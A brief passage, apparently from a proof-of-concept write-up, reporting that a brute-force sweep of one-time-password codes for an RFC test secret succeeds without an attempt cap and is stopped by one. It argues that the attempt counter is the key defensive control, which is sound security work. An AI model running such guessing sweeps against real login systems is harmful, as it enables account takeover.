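With max_attempts=None the sweep succeeds after 287,083 guesses for the RFC secret at t=59; with the cap it stops at the sixth attempt with "locked". A production verifier would add a cooldown or an alert instead of a permanent in-memory lock, but the attempt counter is the control whose absence the PoC exploits.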